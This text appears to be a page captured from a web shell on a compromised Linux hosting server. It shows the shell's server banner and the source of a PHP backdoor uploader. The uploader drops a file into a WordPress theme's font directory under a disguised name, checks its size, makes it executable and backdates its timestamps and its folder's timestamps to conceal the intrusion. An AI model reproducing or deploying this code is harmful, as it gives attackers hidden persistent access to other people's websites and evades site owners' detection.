| Server IP : 198.54.126.135 / Your IP : 216.73.216.217 Web Server : Apache System : Linux host11.registrar-servers.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : linearpo ( 12988) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /dev/shm/ |
Upload File : |
<?php $p = "/home/marasidaisafari/public_html/wp-content/themes/twentytwentyfour/assets/fonts/cardo/data_ranks"; $ft = 1722621062; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 583252) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 583252"; } @unlink($p); } } die('_upload_failed_');